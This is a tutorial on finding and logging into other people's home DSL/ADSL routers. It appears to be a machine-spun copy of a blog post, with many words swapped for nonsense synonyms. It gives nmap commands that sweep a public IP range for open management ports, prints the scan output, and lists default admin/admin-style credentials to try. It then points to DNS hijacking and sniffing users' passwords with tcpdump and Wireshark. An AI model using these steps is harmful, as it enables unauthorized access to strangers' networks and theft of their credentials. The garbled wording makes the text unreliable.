Asynchronous digital subscriber job (DSL or ADSL) modem is a device used to connect a estimator or router to a telephone job which provides the digital subscriber job service for connectivity to the Internet, which is oftentimes called DSL or ADSL broadband. 
Put this together alongside Wireshark hacking for http websites, you lot got a nightmare for the user behind that router equally all their passwords in addition to details tin endure tracked real easily.
What's inward a DSL ADSL Router? - Click to expand
What's inward a DSL ADSL Router? - Click to expand
What’s inward a DSL ADSL Router?
A DSL or ADSL router consists of a box which has an RJ11 jack to connect to a measure subscriber telephone line. It has several RJ45 jacks for Ethernet cables to connect it to computers or printers, creating a local network. It ordinarily besides has a USB jack which tin endure used to connect to computers via a USB cable, to allow connectedness to computers without an Ethernet port. H5N1 wireless DSL or ADSL router besides has antennas to allow it to deed equally a wireless access point, therefore computers tin connect to it forming a wireless network. Power is ordinarily supplied past times a cord from a wall wart transformer. It ordinarily has a serial of LED condition lights which exhibit the condition of parts of the DSL or ADSL communications link:
- Power calorie-free – indicates that the modem is turned on in addition to has power.
- Ethernet lights – There is ordinarily a calorie-free over each Ethernet jack. H5N1 steady (or sometimes flashing) calorie-free indicates that the Ethernet link to that estimator or device is functioning
- DSL or ADSL calorie-free – a steady calorie-free indicates that the modem has established contact alongside the equipment inward the local substitution (DSL or ADSLAM) therefore the DSL or ADSL link over the telephone job is functioning
- Internet calorie-free – a steady calorie-free indicates that the IP address in addition to DHCP protocol are initialized in addition to working, therefore the organisation is connected to the Internet
- Wireless calorie-free – only inward wireless DSL or ADSL modems, this indicates that the wireless network is initialized in addition to working
Almost every ADSL DSL modem router provides a management web-page available via Internal network (LAN or Local surface area network) for device management, configuration in addition to condition reporting. You are supposed to login to the management web-page, configure a username password combination provided past times your Internet service provider (Internet service provider) which in addition to therefore allows you lot to connect to internet. The network is divided into ii parts:
External Network
External network indicates the component where ADSL DSL modem routers connects to upstream provider for cyberspace connectivity. Once connected to the Internet service provider via a Phone job (ADSL DSL Modem routers tin exercise conventional Copper Phone lines to connect to Internet service provider at a much higher speed), the router gets an IP address. This is ordinarily a Publicly routable IP address which is opened upwards to the whole world.
Internal Network
Internal network indicates the component where devices inward Local Area Network connects to the ADSL DSL modem router via either Wireless or Ethernet cable. Most modem DSL ADSL Modem routers runs a DHCP server internally which assigns an Internall IP address to the connected device. When I enjoin device, this tin endure anything from a conventional computer, a laptop, a telephone (Android, Apple, Nokia or Blackberry etc.), H5N1 smart TV, H5N1 Car, NAS, SAN, An orange, H5N1 banana, H5N1 cow, H5N1 dragon, Harry Potter … I hateful anything that’s able to connect to internet! So you lot instruct the idea. Each device get’s it’s ain IP address, a Gateway IP in addition to DNS entries. Depending on unlike DSL ADSL Modem router, this tin endure slightly different, but the persuasion remains the same, the DSL ADSL Router allows users to part cyberspace connectivity. These DSL ADSL Modem Routers are similar miniature Gateway devices that tin convey many services running on them. Usually they all exercise BusyBox or similar proprietary Linux applications on them. You desire to know what a DSL ADSL Router tin do? Here’s a listing of mutual services that tin run on a DSL ADSL Modem Router:
- ADSL2 and/or ADSL2+ support
- Antenna/ae (wireless)
- Bridge/Half-bridge mode
- Cookie blocking
- DHCP server
- DDNS support
- DoS protection
- Switching
- Intrusion detection
- LAN port charge per unit of measurement limiting
- Inbuilt firewall
- Inbuilt or Free micro-filter
- Java/ActiveX applet blocking
- Javascript blocking
- MAC address filtering
- Multiple world IP address binding
- NAT
- Packet filter
- Port forwarding/port arrive at forwarding
- POP postal service checking
- QoS (especially useful for VoIP applications)
- RIP-1/RIP-2
- SNTP facility
- SPI firewall
- Static routing
- So-called “DMZ” facility
- RFC1483 (bridged/routed)
- IPoA
- PPPoE
- PPPoA
- Embedded PPPoX login clients
- Parental controls
- Print server inbuilt
- Scheduling past times time/day of week
- USB impress server
- URL blocking facility
- UPnP facility
- VPN pass-through
- Embedded VPN servers
- WEP 64/128/256 chip (wireless security)
- WPA (wireless security)
- WPA-PSK (wireless security)
That’s a lot of services running on a small-scale device that are configured past times nanny, granny, uncle, aunt in addition to the side past times side door neighbour, inward brusk many non technical people unopen to the world. How many of those configured badly? Left ports opened upwards left correct in addition to center? Didn’t modify default admin passwords? Many! I hateful MANY! In this guide nosotros volition exercise namp to scan a arrive at of IP addresses, from output nosotros volition decide which are DSL ADSL Routers in addition to convey left their Management ports opened upwards to External Network. (again read top department to know which i is a external network). H5N1 typical ADSL Router’s Management interface is available via next URL:
http://10.0.0.1/
http://192.168.0.1/
http://192.168.1.1/
http://192.168.1.254/
etc.
This is the Management page for DSL ADSL modem router in addition to it’s ever protected past times a password. By default, this password is written below a DSL ADSL modem router inward a sticker in addition to they are i of these combinations: Username/Password
admin/admin
admin/password
admin/pass
admin/secret
etc.
A lot of the domicile users doesn’t modify this password. Well, that’s ok. It doesn’t wound much crusade this is only available via a connected device. But what’s non OKAY is when users opened upwards up their management to the external network. All you lot demand to know what’s the Public IP address for your target in addition to simply sweat to access this management page externally.
Installing NMAP
I exercise Kali Linux which comes alongside NMAP Preinstalled. If you lot are using Windows or Mac (or whatever other flavor of Linux) instruct to the next website to download in addition to install NMAP.
Linux Installation:
For Ubuntu, Debian or aptitude based organisation NMAP is ordinarily made available via default repository. Install NMAP using the next command:
sudo apt-get install nmap
For YUM Based systems such equally Redhat, CentOS, install via
sudo yum install nmap
For PACMAN based systems such equally Arch Linux, install via
sudo pacman -S nmap
Windows Installation:
For Windows Computers, download installer in addition to run the executable. Link: http://nmap.org/dist/nmap-6.46-setup.exe
Mac Installation:
For Mac users, download installer in addition to install Link: http://nmap.org/dist/nmap-6.46.dmg
Official NMAP site
You tin read to a greater extent than nigh NMAP here: http://nmap.org/
Search for Vulnerable Routers
Now that nosotros convey NMAP sorted, nosotros are going to run the next command to scan for ADSL Modem Routers based on their Banner on Port eighty to starting fourth dimension our ADSL router hack. All you lot demand is to alternative an IP range. I’ve used an instance below using 101.53.64.1/24 range.
Search from Linux using command Line
In Linux run the next command:
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'
In Windows or Mac opened upwards NMAP in addition to re-create glue this line:
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -
Once it finds the results, search for the give-and-take ‘open’ to narrow downward results. H5N1 typical Linux NMAP command would render outputs job below: (and of course of study I’ve changed the IP details)
Host: 101.53.64.3 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.4 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.9 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.19 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.20 () Ports: 80/open/tcp//http//Fortinet VPN|firewall http config/
Host: 101.53.64.23 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.31 () Ports: 80/open/tcp//http?///
Host: 101.53.64.33 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.35 () Ports: 80/open/tcp//http?///
Host: 101.53.64.37 () Ports: 80/open/tcp//http?///
Host: 101.53.64.49 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.52 () Ports: 80/open/tcp//http?///
Host: 101.53.64.53 () Ports: 80/open/tcp//ssl|http//thttpd/
Host: 101.53.64.58 () Ports: 80/open/tcp//http?///
Host: 101.53.64.63 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.69 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.79 () Ports: 80/open/tcp//http//Apache httpd/
Host: 101.53.64.85 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.107 () Ports: 80/open/tcp//http?///
Host: 101.53.64.112 () Ports: 80/open/tcp//http?///
Host: 101.53.64.115 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.123 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.129 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.135 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.145 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.149 () Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/
Host: 101.53.64.167 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.170 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.186 () Ports: 80/open/tcp//http?///
Host: 101.53.64.188 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.193 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.202 () Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/
Host: 101.53.64.214 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.224 () Ports: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0 (ZyXEL ZyWALL 2)/
This was taking a long fourth dimension (we are after all sweat to scan 256 hosts using the command above). Me existence simply impatient, I wanted to depository fiscal establishment gibe if my Kali Linux was truly doing anything to ADSL router hack. I used the next command inward a separate Terminal to monitor what my PC was doing… it was doing a lot …
tcpdump -ni eth0
That’s a lot of connected hosts alongside TCP Port eighty open. Some got ‘tcpwrapped’ marked on them. It way they are maybe non accessible.
Search from Windows, Mac or Linux using GUI – NMAP or Zenmap
Assuming you lot got NMAP installation sorted, you lot tin directly opened upwards NMAP (In Kali Linux or similar Linux distro, you lot tin exercise Zenmap which is GUI version of NAMP cross platform). Copy glue the next job inward Command field
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/26 -p80 -oG -
another version of this command is using unlike representation of Subnet MASK.
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -
Press SCAN Button in addition to hold off few minutes till the scan is over.
Once you lot convey some results, in addition to therefore you lot demand to give away the opened upwards devices alongside opened upwards ports. In search Result page:
- Click on Services Button
- Click on http Service
- Click on Ports/Hosts TAB (Twice to form them past times status)
As you lot tin see, I’ve found a few devices alongside opened upwards http port 80.
It is quite amazing how many devices got ports opened upwards facing outer DMZ.
Access Management Webpage
Pick i at a time. For instance sweat this:
http://101.53.64.3
http://101.53.64.4
http://101.53.64.129
You instruct the idea. If it opens a webpage bespeak for username in addition to password, sweat i of the next combinations:
admin/admin
admin/password
admin/pass
admin/secret
If you lot tin give away the Router’s model number in addition to make, you lot tin give away exact username in addition to password from this webpage: http://portforward.com/default_username_password/ Before nosotros complete up, I am certain you lot were already impatient similar me equally a lot of the routers had ‘tcpwrapped’ on them which was truly stopping us from accessing the spider web management interface to ADSL router hack. Following command volition exclude those devices from our search. I’ve besides expanded my search to a broader arrive at using a slightly unlike Subnet MASK.
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/22 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'
In this command I am using /22 Subnet Mask alongside 2 specific outputs: I am looking for the piece of work ‘open’ in addition to excluding ‘tcpwrapped’ on my output. As you lot tin see, I nonetheless instruct a lot of outputs.
Conclusion
You’ll endure surprised how many convey default username in addition to passwords enabled. Once you lot instruct your access to the router, you lot tin practise a lot more, similar DNS hijacking, bag username in addition to passwords (for example: Social Media username passwords (FaceBook, Twitter, WebMail etc.)) using tcpdump/snoop on router’s interface in addition to many to a greater extent than using ADSL router hack … Why did I write this guide? I instruct lots of feedback via Contact Us page. Here’s i for example:
As you lot tin run across Jhefeson likely has a legitimate argue to sweat in addition to reboot this shared router, but he can’t simply because he doesn’t convey physical access to it. If this guide works, he tin truly instruct access back.
There’s many things you lot tin practise after you’ve got access to a router. You tin modify DNS settings, setup a tcpdump in addition to after snoop all plaintext passwords using wireshark etc. If you lot know a friends, family. colleague or vecino who didn’t modify their routers default password, allow them know of the risks.
But I am non hither to guess whether it should endure done or not, but this is definitely a way to gain access to a router. So hacking is non ever bad, it sometime is required when you lot liberate access or a organisation simply wouldn’t respond. As a pentester, you lot should heighten awareness. Share this guide equally anyone who uses a Linux, Windows, Mac tin exercise this guide to attempt out their ain network in addition to create ADSL router hack issue.
